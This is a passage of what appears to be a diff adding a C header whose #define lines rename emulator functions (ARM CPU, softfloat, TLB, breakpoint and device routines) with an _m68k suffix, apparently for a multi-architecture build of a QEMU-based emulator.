arm_el_is_aa64_m68k +#define arm_env_get_cpu arm_env_get_cpu_m68k +#define arm_excp_target_el arm_excp_target_el_m68k +#define arm_excp_unmasked arm_excp_unmasked_m68k +#define arm_feature 
arm_feature_m68k +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_m68k +#define gen_intermediate_code gen_intermediate_code_m68k +#define gen_intermediate_code_pc gen_intermediate_code_pc_m68k +#define arm_gen_test_cc arm_gen_test_cc_m68k +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_m68k +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_m68k +#define arm_handle_psci_call arm_handle_psci_call_m68k +#define arm_is_psci_call arm_is_psci_call_m68k +#define arm_is_secure arm_is_secure_m68k +#define arm_is_secure_below_el3 arm_is_secure_below_el3_m68k +#define arm_ldl_code arm_ldl_code_m68k +#define arm_lduw_code arm_lduw_code_m68k +#define arm_log_exception arm_log_exception_m68k +#define arm_reg_read arm_reg_read_m68k +#define arm_reg_reset arm_reg_reset_m68k +#define arm_reg_write arm_reg_write_m68k +#define restore_state_to_opc restore_state_to_opc_m68k +#define arm_rmode_to_sf arm_rmode_to_sf_m68k +#define arm_singlestep_active arm_singlestep_active_m68k +#define tlb_fill tlb_fill_m68k +#define tlb_flush tlb_flush_m68k +#define tlb_flush_page tlb_flush_page_m68k +#define tlb_set_page tlb_set_page_m68k +#define arm_translate_init arm_translate_init_m68k +#define arm_v7m_class_init arm_v7m_class_init_m68k +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_m68k +#define ats_access ats_access_m68k +#define ats_write ats_write_m68k +#define bad_mode_switch bad_mode_switch_m68k +#define bank_number bank_number_m68k +#define bitmap_zero_extend bitmap_zero_extend_m68k +#define bp_wp_matches bp_wp_matches_m68k +#define breakpoint_invalidate breakpoint_invalidate_m68k +#define build_page_bitmap build_page_bitmap_m68k +#define bus_add_child bus_add_child_m68k +#define bus_class_init bus_class_init_m68k +#define bus_info bus_info_m68k +#define bus_unparent bus_unparent_m68k +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_m68k +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_m68k +#define cache_test_clean_cp_reginfo 
cache_test_clean_cp_reginfo_m68k +#define call_recip_estimate call_recip_estimate_m68k +#define can_merge can_merge_m68k +#define capacity_increase capacity_increase_m68k +#define ccsidr_read ccsidr_read_m68k +#define check_ap check_ap_m68k +#define check_breakpoints check_breakpoints_m68k +#define check_watchpoints check_watchpoints_m68k +#define cho cho_m68k +#define clear_bit clear_bit_m68k +#define clz32 clz32_m68k +#define clz64 clz64_m68k +#define cmp_flatrange_addr cmp_flatrange_addr_m68k +#define code_gen_alloc code_gen_alloc_m68k +#define commonNaNToFloat128 commonNaNToFloat128_m68k +#define commonNaNToFloat16 commonNaNToFloat16_m68k +#define commonNaNToFloat32 commonNaNToFloat32_m68k +#define commonNaNToFloat64 commonNaNToFloat64_m68k +#define commonNaNToFloatx80 commonNaNToFloatx80_m68k +#define compute_abs_deadline compute_abs_deadline_m68k +#define cond_name cond_name_m68k +#define configure_accelerator configure_accelerator_m68k +#define container_get container_get_m68k +#define container_info container_info_m68k +#define container_register_types container_register_types_m68k +#define contextidr_write contextidr_write_m68k +#define core_log_global_start core_log_global_start_m68k +#define core_log_global_stop core_log_global_stop_m68k +#define core_memory_listener core_memory_listener_m68k +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_m68k +#define cortex_a15_initfn cortex_a15_initfn_m68k +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_m68k +#define cortex_a8_initfn cortex_a8_initfn_m68k +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_m68k +#define cortex_a9_initfn cortex_a9_initfn_m68k +#define cortex_m3_initfn cortex_m3_initfn_m68k +#define count_cpreg count_cpreg_m68k +#define countLeadingZeros32 countLeadingZeros32_m68k +#define countLeadingZeros64 countLeadingZeros64_m68k +#define cp_access_ok cp_access_ok_m68k +#define cpacr_write cpacr_write_m68k +#define cpreg_field_is_64bit cpreg_field_is_64bit_m68k +#define cp_reginfo cp_reginfo_m68k 
+#define cpreg_key_compare cpreg_key_compare_m68k +#define cpreg_make_keylist cpreg_make_keylist_m68k +#define cp_reg_reset cp_reg_reset_m68k +#define cpreg_to_kvm_id cpreg_to_kvm_id_m68k +#define cpsr_read cpsr_read_m68k +#define cpsr_write cpsr_write_m68k +#define cptype_valid cptype_valid_m68k +#define cpu_abort cpu_abort_m68k +#define cpu_arm_exec cpu_arm_exec_m68k +#define cpu_arm_gen_code cpu_arm_gen_code_m68k +#define cpu_arm_init cpu_arm_init_m68k +#define cpu_breakpoint_insert cpu_breakpoint_insert_m68k +#define cpu_breakpoint_remove cpu_breakpoint_remove_m68k +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_m68k +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_m68k +#define cpu_can_do_io cpu_can_do_io_m68k +#define cpu_can_run cpu_can_run_m68k +#define cpu_class_init cpu_class_init_m68k +#define cpu_common_class_by_name cpu_common_class_by_name_m68k +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_m68k +#define cpu_common_get_arch_id cpu_common_get_arch_id_m68k +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_m68k +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_m68k +#define cpu_common_has_work cpu_common_has_work_m68k +#define cpu_common_initfn cpu_common_initfn_m68k +#define cpu_common_noop cpu_common_noop_m68k +#define cpu_common_parse_features cpu_common_parse_features_m68k +#define cpu_common_realizefn cpu_common_realizefn_m68k +#define cpu_common_reset cpu_common_reset_m68k +#define cpu_dump_statistics cpu_dump_statistics_m68k +#define cpu_exec_init cpu_exec_init_m68k +#define cpu_flush_icache_range cpu_flush_icache_range_m68k +#define cpu_gen_init cpu_gen_init_m68k +#define cpu_get_clock cpu_get_clock_m68k +#define cpu_get_real_ticks cpu_get_real_ticks_m68k +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_m68k +#define cpu_handle_debug_exception cpu_handle_debug_exception_m68k +#define cpu_handle_guest_debug cpu_handle_guest_debug_m68k +#define cpu_inb cpu_inb_m68k 
+#define cpu_inl cpu_inl_m68k +#define cpu_interrupt cpu_interrupt_m68k +#define cpu_interrupt_handler cpu_interrupt_handler_m68k +#define cpu_inw cpu_inw_m68k +#define cpu_io_recompile cpu_io_recompile_m68k +#define cpu_is_stopped cpu_is_stopped_m68k +#define cpu_ldl_code cpu_ldl_code_m68k +#define cpu_ldub_code cpu_ldub_code_m68k +#define cpu_lduw_code cpu_lduw_code_m68k +#define cpu_memory_rw_debug cpu_memory_rw_debug_m68k +#define cpu_mmu_index cpu_mmu_index_m68k +#define cpu_outb cpu_outb_m68k +#define cpu_outl cpu_outl_m68k +#define cpu_outw cpu_outw_m68k +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_m68k +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_m68k +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_m68k +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_m68k +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_m68k +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_m68k +#define cpu_physical_memory_map cpu_physical_memory_map_m68k +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_m68k +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_m68k +#define cpu_physical_memory_rw cpu_physical_memory_rw_m68k +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_m68k +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_m68k +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_m68k +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_m68k +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_m68k +#define cpu_register cpu_register_m68k +#define cpu_register_types cpu_register_types_m68k +#define cpu_restore_state cpu_restore_state_m68k +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_m68k +#define cpu_single_step cpu_single_step_m68k +#define 
cpu_tb_exec cpu_tb_exec_m68k +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_m68k +#define cpu_to_be64 cpu_to_be64_m68k +#define cpu_to_le32 cpu_to_le32_m68k +#define cpu_to_le64 cpu_to_le64_m68k +#define cpu_type_info cpu_type_info_m68k +#define cpu_unassigned_access cpu_unassigned_access_m68k +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_m68k +#define cpu_watchpoint_insert cpu_watchpoint_insert_m68k +#define cpu_watchpoint_remove cpu_watchpoint_remove_m68k +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_m68k +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_m68k +#define crc32c_table crc32c_table_m68k +#define create_new_memory_mapping create_new_memory_mapping_m68k +#define csselr_write csselr_write_m68k +#define cto32 cto32_m68k +#define ctr_el0_access ctr_el0_access_m68k +#define ctz32 ctz32_m68k +#define ctz64 ctz64_m68k +#define dacr_write dacr_write_m68k +#define dbgbcr_write dbgbcr_write_m68k +#define dbgbvr_write dbgbvr_write_m68k +#define dbgwcr_write dbgwcr_write_m68k +#define dbgwvr_write dbgwvr_write_m68k +#define debug_cp_reginfo debug_cp_reginfo_m68k +#define debug_frame debug_frame_m68k +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_m68k +#define define_arm_cp_regs define_arm_cp_regs_m68k +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_m68k +#define define_debug_regs define_debug_regs_m68k +#define define_one_arm_cp_reg define_one_arm_cp_reg_m68k +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_m68k +#define deposit32 deposit32_m68k +#define deposit64 deposit64_m68k +#define deregister_tm_clones deregister_tm_clones_m68k +#define device_class_base_init device_class_base_init_m68k +#define device_class_init device_class_init_m68k +#define device_finalize device_finalize_m68k +#define device_get_realized device_get_realized_m68k +#define device_initfn device_initfn_m68k +#define device_post_init device_post_init_m68k +#define 
device_reset device_reset_m68k +#define device_set_realized device_set_realized_m68k +#define device_type_info device_type_info_m68k +#define disas_arm_insn disas_arm_insn_m68k +#define disas_coproc_insn disas_coproc_insn_m68k +#define disas_dsp_insn disas_dsp_insn_m68k +#define disas_iwmmxt_insn disas_iwmmxt_insn_m68k +#define disas_neon_data_insn disas_neon_data_insn_m68k +#define disas_neon_ls_insn disas_neon_ls_insn_m68k +#define disas_thumb2_insn disas_thumb2_insn_m68k +#define disas_thumb_insn disas_thumb_insn_m68k +#define disas_vfp_insn disas_vfp_insn_m68k +#define disas_vfp_v8_insn disas_vfp_v8_insn_m68k +#define do_arm_semihosting do_arm_semihosting_m68k +#define do_clz16 do_clz16_m68k +#define do_clz8 do_clz8_m68k +#define do_constant_folding do_constant_folding_m68k +#define do_constant_folding_2 do_constant_folding_2_m68k +#define do_constant_folding_cond do_constant_folding_cond_m68k +#define do_constant_folding_cond2 do_constant_folding_cond2_m68k +#define do_constant_folding_cond_32 do_constant_folding_cond_32_m68k +#define do_constant_folding_cond_64 do_constant_folding_cond_64_m68k +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_m68k +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_m68k +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_m68k +#define do_ssat do_ssat_m68k +#define do_usad do_usad_m68k +#define do_usat do_usat_m68k +#define do_v7m_exception_exit do_v7m_exception_exit_m68k +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_m68k +#define dummy_func dummy_func_m68k +#define dummy_section dummy_section_m68k +#define _DYNAMIC _DYNAMIC_m68k +#define _edata _edata_m68k +#define _end _end_m68k +#define end_list end_list_m68k +#define eq128 eq128_m68k +#define ErrorClass_lookup ErrorClass_lookup_m68k +#define error_copy error_copy_m68k +#define error_exit error_exit_m68k +#define error_get_class error_get_class_m68k +#define error_get_pretty error_get_pretty_m68k +#define error_setg_file_open error_setg_file_open_m68k +#define 
estimateDiv128To64 estimateDiv128To64_m68k +#define estimateSqrt32 estimateSqrt32_m68k +#define excnames excnames_m68k +#define excp_is_internal excp_is_internal_m68k +#define extended_addresses_enabled extended_addresses_enabled_m68k +#define extended_mpu_ap_bits extended_mpu_ap_bits_m68k +#define extract32 extract32_m68k +#define extract64 extract64_m68k +#define extractFloat128Exp extractFloat128Exp_m68k +#define extractFloat128Frac0 extractFloat128Frac0_m68k +#define extractFloat128Frac1 extractFloat128Frac1_m68k +#define extractFloat128Sign extractFloat128Sign_m68k +#define extractFloat16Exp extractFloat16Exp_m68k +#define extractFloat16Frac extractFloat16Frac_m68k +#define extractFloat16Sign extractFloat16Sign_m68k +#define extractFloat32Exp extractFloat32Exp_m68k +#define extractFloat32Frac extractFloat32Frac_m68k +#define extractFloat32Sign extractFloat32Sign_m68k +#define extractFloat64Exp extractFloat64Exp_m68k +#define extractFloat64Frac extractFloat64Frac_m68k +#define extractFloat64Sign extractFloat64Sign_m68k +#define extractFloatx80Exp extractFloatx80Exp_m68k +#define extractFloatx80Frac extractFloatx80Frac_m68k +#define extractFloatx80Sign extractFloatx80Sign_m68k +#define fcse_write fcse_write_m68k +#define find_better_copy find_better_copy_m68k +#define find_default_machine find_default_machine_m68k +#define find_desc_by_name find_desc_by_name_m68k +#define find_first_bit find_first_bit_m68k +#define find_paging_enabled_cpu find_paging_enabled_cpu_m68k +#define find_ram_block find_ram_block_m68k +#define find_ram_offset find_ram_offset_m68k +#define find_string find_string_m68k +#define find_type find_type_m68k +#define _fini _fini_m68k +#define flatrange_equal flatrange_equal_m68k +#define flatview_destroy flatview_destroy_m68k +#define flatview_init flatview_init_m68k +#define flatview_insert flatview_insert_m68k +#define flatview_lookup flatview_lookup_m68k +#define flatview_ref flatview_ref_m68k +#define flatview_simplify 
flatview_simplify_m68k +#define flatview_unref flatview_unref_m68k +#define float128_add float128_add_m68k +#define float128_compare float128_compare_m68k +#define float128_compare_internal float128_compare_internal_m68k +#define float128_compare_quiet float128_compare_quiet_m68k +#define float128_default_nan float128_default_nan_m68k +#define float128_div float128_div_m68k +#define float128_eq float128_eq_m68k +#define float128_eq_quiet float128_eq_quiet_m68k +#define float128_is_quiet_nan float128_is_quiet_nan_m68k +#define float128_is_signaling_nan float128_is_signaling_nan_m68k +#define float128_le float128_le_m68k +#define float128_le_quiet float128_le_quiet_m68k +#define float128_lt float128_lt_m68k +#define float128_lt_quiet float128_lt_quiet_m68k +#define float128_maybe_silence_nan float128_maybe_silence_nan_m68k +#define float128_mul float128_mul_m68k +#define float128_rem float128_rem_m68k +#define float128_round_to_int float128_round_to_int_m68k +#define float128_scalbn float128_scalbn_m68k +#define float128_sqrt float128_sqrt_m68k +#define float128_sub float128_sub_m68k +#define float128ToCommonNaN float128ToCommonNaN_m68k +#define float128_to_float32 float128_to_float32_m68k +#define float128_to_float64 float128_to_float64_m68k +#define float128_to_floatx80 float128_to_floatx80_m68k +#define float128_to_int32 float128_to_int32_m68k +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_m68k +#define float128_to_int64 float128_to_int64_m68k +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_m68k +#define float128_unordered float128_unordered_m68k +#define float128_unordered_quiet float128_unordered_quiet_m68k +#define float16_default_nan float16_default_nan_m68k +#define float16_is_quiet_nan float16_is_quiet_nan_m68k +#define float16_is_signaling_nan float16_is_signaling_nan_m68k +#define float16_maybe_silence_nan float16_maybe_silence_nan_m68k +#define float16ToCommonNaN float16ToCommonNaN_m68k +#define 
float16_to_float32 float16_to_float32_m68k +#define float16_to_float64 float16_to_float64_m68k +#define float32_abs float32_abs_m68k +#define float32_add float32_add_m68k +#define float32_chs float32_chs_m68k +#define float32_compare float32_compare_m68k +#define float32_compare_internal float32_compare_internal_m68k +#define float32_compare_quiet float32_compare_quiet_m68k +#define float32_default_nan float32_default_nan_m68k +#define float32_div float32_div_m68k +#define float32_eq float32_eq_m68k +#define float32_eq_quiet float32_eq_quiet_m68k +#define float32_exp2 float32_exp2_m68k +#define float32_exp2_coefficients float32_exp2_coefficients_m68k +#define float32_is_any_nan float32_is_any_nan_m68k +#define float32_is_infinity float32_is_infinity_m68k +#define float32_is_neg float32_is_neg_m68k +#define float32_is_quiet_nan float32_is_quiet_nan_m68k +#define float32_is_signaling_nan float32_is_signaling_nan_m68k +#define float32_is_zero float32_is_zero_m68k +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_m68k +#define float32_le float32_le_m68k +#define float32_le_quiet float32_le_quiet_m68k +#define float32_log2 float32_log2_m68k +#define float32_lt float32_lt_m68k +#define float32_lt_quiet float32_lt_quiet_m68k +#define float32_max float32_max_m68k +#define float32_maxnum float32_maxnum_m68k +#define float32_maxnummag float32_maxnummag_m68k +#define float32_maybe_silence_nan float32_maybe_silence_nan_m68k +#define float32_min float32_min_m68k +#define float32_minmax float32_minmax_m68k +#define float32_minnum float32_minnum_m68k +#define float32_minnummag float32_minnummag_m68k +#define float32_mul float32_mul_m68k +#define float32_muladd float32_muladd_m68k +#define float32_rem float32_rem_m68k +#define float32_round_to_int float32_round_to_int_m68k +#define float32_scalbn float32_scalbn_m68k +#define float32_set_sign float32_set_sign_m68k +#define float32_sqrt float32_sqrt_m68k +#define float32_squash_input_denormal 
float32_squash_input_denormal_m68k +#define float32_sub float32_sub_m68k +#define float32ToCommonNaN float32ToCommonNaN_m68k +#define float32_to_float128 float32_to_float128_m68k +#define float32_to_float16 float32_to_float16_m68k +#define float32_to_float64 float32_to_float64_m68k +#define float32_to_floatx80 float32_to_floatx80_m68k +#define float32_to_int16 float32_to_int16_m68k +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_m68k +#define float32_to_int32 float32_to_int32_m68k +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_m68k +#define float32_to_int64 float32_to_int64_m68k +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_m68k +#define float32_to_uint16 float32_to_uint16_m68k +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_m68k +#define float32_to_uint32 float32_to_uint32_m68k +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_m68k +#define float32_to_uint64 float32_to_uint64_m68k +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_m68k +#define float32_unordered float32_unordered_m68k +#define float32_unordered_quiet float32_unordered_quiet_m68k +#define float64_abs float64_abs_m68k +#define float64_add float64_add_m68k +#define float64_chs float64_chs_m68k +#define float64_compare float64_compare_m68k +#define float64_compare_internal float64_compare_internal_m68k +#define float64_compare_quiet float64_compare_quiet_m68k +#define float64_default_nan float64_default_nan_m68k +#define float64_div float64_div_m68k +#define float64_eq float64_eq_m68k +#define float64_eq_quiet float64_eq_quiet_m68k +#define float64_is_any_nan float64_is_any_nan_m68k +#define float64_is_infinity float64_is_infinity_m68k +#define float64_is_neg float64_is_neg_m68k +#define float64_is_quiet_nan float64_is_quiet_nan_m68k +#define float64_is_signaling_nan float64_is_signaling_nan_m68k +#define float64_is_zero float64_is_zero_m68k +#define float64_le 
float64_le_m68k +#define float64_le_quiet float64_le_quiet_m68k +#define float64_log2 float64_log2_m68k +#define float64_lt float64_lt_m68k +#define float64_lt_quiet float64_lt_quiet_m68k +#define float64_max float64_max_m68k +#define float64_maxnum float64_maxnum_m68k +#define float64_maxnummag float64_maxnummag_m68k +#define float64_maybe_silence_nan float64_maybe_silence_nan_m68k +#define float64_min float64_min_m68k +#define float64_minmax float64_minmax_m68k +#define float64_minnum float64_minnum_m68k +#define float64_minnummag float64_minnummag_m68k +#define float64_mul float64_mul_m68k +#define float64_muladd float64_muladd_m68k +#define float64_rem float64_rem_m68k +#define float64_round_to_int float64_round_to_int_m68k +#define float64_scalbn float64_scalbn_m68k +#define float64_set_sign float64_set_sign_m68k +#define float64_sqrt float64_sqrt_m68k +#define float64_squash_input_denormal float64_squash_input_denormal_m68k +#define float64_sub float64_sub_m68k +#define float64ToCommonNaN float64ToCommonNaN_m68k +#define float64_to_float128 float64_to_float128_m68k +#define float64_to_float16 float64_to_float16_m68k +#define float64_to_float32 float64_to_float32_m68k +#define float64_to_floatx80 float64_to_floatx80_m68k +#define float64_to_int16 float64_to_int16_m68k +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_m68k +#define float64_to_int32 float64_to_int32_m68k +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_m68k +#define float64_to_int64 float64_to_int64_m68k +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_m68k +#define float64_to_uint16 float64_to_uint16_m68k +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_m68k +#define float64_to_uint32 float64_to_uint32_m68k +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_m68k +#define float64_to_uint64 float64_to_uint64_m68k +#define float64_to_uint64_round_to_zero 
float64_to_uint64_round_to_zero_m68k +#define float64_trunc_to_int float64_trunc_to_int_m68k +#define float64_unordered float64_unordered_m68k +#define float64_unordered_quiet float64_unordered_quiet_m68k +#define float_raise float_raise_m68k +#define floatx80_add floatx80_add_m68k +#define floatx80_compare floatx80_compare_m68k +#define floatx80_compare_internal floatx80_compare_internal_m68k +#define floatx80_compare_quiet floatx80_compare_quiet_m68k +#define floatx80_default_nan floatx80_default_nan_m68k +#define floatx80_div floatx80_div_m68k +#define floatx80_eq floatx80_eq_m68k +#define floatx80_eq_quiet floatx80_eq_quiet_m68k +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_m68k +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_m68k +#define floatx80_le floatx80_le_m68k +#define floatx80_le_quiet floatx80_le_quiet_m68k +#define floatx80_lt floatx80_lt_m68k +#define floatx80_lt_quiet floatx80_lt_quiet_m68k +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_m68k +#define floatx80_mul floatx80_mul_m68k +#define floatx80_rem floatx80_rem_m68k +#define floatx80_round_to_int floatx80_round_to_int_m68k +#define floatx80_scalbn floatx80_scalbn_m68k +#define floatx80_sqrt floatx80_sqrt_m68k +#define floatx80_sub floatx80_sub_m68k +#define floatx80ToCommonNaN floatx80ToCommonNaN_m68k +#define floatx80_to_float128 floatx80_to_float128_m68k +#define floatx80_to_float32 floatx80_to_float32_m68k +#define floatx80_to_float64 floatx80_to_float64_m68k +#define floatx80_to_int32 floatx80_to_int32_m68k +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_m68k +#define floatx80_to_int64 floatx80_to_int64_m68k +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_m68k +#define floatx80_unordered floatx80_unordered_m68k +#define floatx80_unordered_quiet floatx80_unordered_quiet_m68k +#define flush_icache_range flush_icache_range_m68k +#define format_string format_string_m68k +#define fp_decode_rm fp_decode_rm_m68k 
+#define frame_dummy frame_dummy_m68k +#define free_range free_range_m68k +#define fstat64 fstat64_m68k +#define futex_wait futex_wait_m68k +#define futex_wake futex_wake_m68k +#define gen_aa32_ld16s gen_aa32_ld16s_m68k +#define gen_aa32_ld16u gen_aa32_ld16u_m68k +#define gen_aa32_ld32u gen_aa32_ld32u_m68k +#define gen_aa32_ld64 gen_aa32_ld64_m68k +#define gen_aa32_ld8s gen_aa32_ld8s_m68k +#define gen_aa32_ld8u gen_aa32_ld8u_m68k +#define gen_aa32_st16 gen_aa32_st16_m68k +#define gen_aa32_st32 gen_aa32_st32_m68k +#define gen_aa32_st64 gen_aa32_st64_m68k +#define gen_aa32_st8 gen_aa32_st8_m68k +#define gen_adc gen_adc_m68k +#define gen_adc_CC gen_adc_CC_m68k +#define gen_add16 gen_add16_m68k +#define gen_add_carry gen_add_carry_m68k +#define gen_add_CC gen_add_CC_m68k +#define gen_add_datah_offset gen_add_datah_offset_m68k +#define gen_add_data_offset gen_add_data_offset_m68k +#define gen_addq gen_addq_m68k +#define gen_addq_lo gen_addq_lo_m68k +#define gen_addq_msw gen_addq_msw_m68k +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_m68k +#define gen_arm_shift_im gen_arm_shift_im_m68k +#define gen_arm_shift_reg gen_arm_shift_reg_m68k +#define gen_bx gen_bx_m68k +#define gen_bx_im gen_bx_im_m68k +#define gen_clrex gen_clrex_m68k +#define generate_memory_topology generate_memory_topology_m68k +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_m68k +#define gen_exception gen_exception_m68k +#define gen_exception_insn gen_exception_insn_m68k +#define gen_exception_internal gen_exception_internal_m68k +#define gen_exception_internal_insn gen_exception_internal_insn_m68k +#define gen_exception_return gen_exception_return_m68k +#define gen_goto_tb gen_goto_tb_m68k +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_m68k +#define gen_helper_add_saturate gen_helper_add_saturate_m68k +#define gen_helper_add_setq gen_helper_add_setq_m68k +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_m68k +#define gen_helper_clz32 
gen_helper_clz32_m68k +#define gen_helper_clz64 gen_helper_clz64_m68k +#define gen_helper_clz_arm gen_helper_clz_arm_m68k +#define gen_helper_cpsr_read gen_helper_cpsr_read_m68k +#define gen_helper_cpsr_write gen_helper_cpsr_write_m68k +#define gen_helper_crc32_arm gen_helper_crc32_arm_m68k +#define gen_helper_crc32c gen_helper_crc32c_m68k +#define gen_helper_crypto_aese gen_helper_crypto_aese_m68k +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_m68k +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_m68k +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_m68k +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_m68k +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_m68k +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_m68k +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_m68k +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_m68k +#define gen_helper_double_saturate gen_helper_double_saturate_m68k +#define gen_helper_exception_internal gen_helper_exception_internal_m68k +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_m68k +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_m68k +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_m68k +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_m68k +#define gen_helper_get_user_reg gen_helper_get_user_reg_m68k +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_m68k +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_m68k +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_m68k +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_m68k +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_m68k +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_m68k +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_m68k +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_m68k +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_m68k +#define 
gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_m68k +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_m68k +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_m68k +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_m68k +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_m68k +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_m68k +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_m68k +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_m68k +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_m68k +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_m68k +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_m68k +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_m68k +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_m68k +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_m68k +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_m68k +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_m68k +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_m68k +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_m68k +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_m68k +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_m68k +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_m68k +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_m68k +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_m68k +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_m68k +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_m68k +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_m68k +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_m68k +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_m68k +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_m68k +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_m68k +#define 